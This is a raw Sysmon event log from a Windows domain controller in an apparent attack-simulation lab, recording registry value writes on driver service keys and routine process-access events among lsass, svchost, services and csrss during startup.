13:33:58.736{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\NextInstanceDWORD (0x0000001f) 13241300x8000000000000000934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.736{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\CountDWORD (0x0000001f) 13241300x8000000000000000933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.736{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\30UMB\UMB\1&841921d&0&TERMINPUT_BUS 13241300x8000000000000000932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.736{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\NextInstanceDWORD (0x00000002) 13241300x8000000000000000931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.736{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\CountDWORD (0x00000002) 13241300x8000000000000000930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.736{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\1UMB\UMB\1&841921d&0&TERMINPUT_BUS 10341000x8000000000000000929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.736{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.736{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.736{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.736{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1700-00000000A301}1632C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.721{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.721{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.705{59A5CD1D-8E44-6005-0A00-00000000A301}848944C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1700-00000000A301}1632C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.705{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1700-00000000A301}1632C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.705{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-1700-00000000A301}1632C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.705{59A5CD1D-8E44-6005-0A00-00000000A301}848948C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1700-00000000A301}1632C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.689{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.689{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:33:58.689{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\rspndr\DriverMinorVersionDWORD (0x00000000) 13241300x8000000000000000912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.689{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\rspndr\DriverMajorVersionDWORD (0x00000000) 13241300x8000000000000000911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.689{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\rspndr\NdisMinorVersionDWORD (0x0000001e) 13241300x8000000000000000910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.689{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\rspndr\NdisMajorVersionDWORD (0x00000006) 13241300x8000000000000000909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.689{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\DriverMinorVersionDWORD (0x00000000) 13241300x8000000000000000908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.689{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\DriverMajorVersionDWORD (0x0000000a) 13241300x8000000000000000907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.689{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\NdisMinorVersionDWORD (0x0000001e) 13241300x8000000000000000906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.689{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\NdisMajorVersionDWORD (0x00000006) 
13241300x8000000000000000905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.689{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\lltdio\DriverMinorVersionDWORD (0x00000000) 13241300x8000000000000000904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.689{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\lltdio\DriverMajorVersionDWORD (0x00000000) 13241300x8000000000000000903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.689{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\lltdio\NdisMinorVersionDWORD (0x0000001e) 13241300x8000000000000000902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.689{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\lltdio\NdisMajorVersionDWORD (0x00000006) 10341000x8000000000000000901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.689{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.689{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.674{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.674{59A5CD1D-8E44-6005-0A00-00000000A301}848940C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.674{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 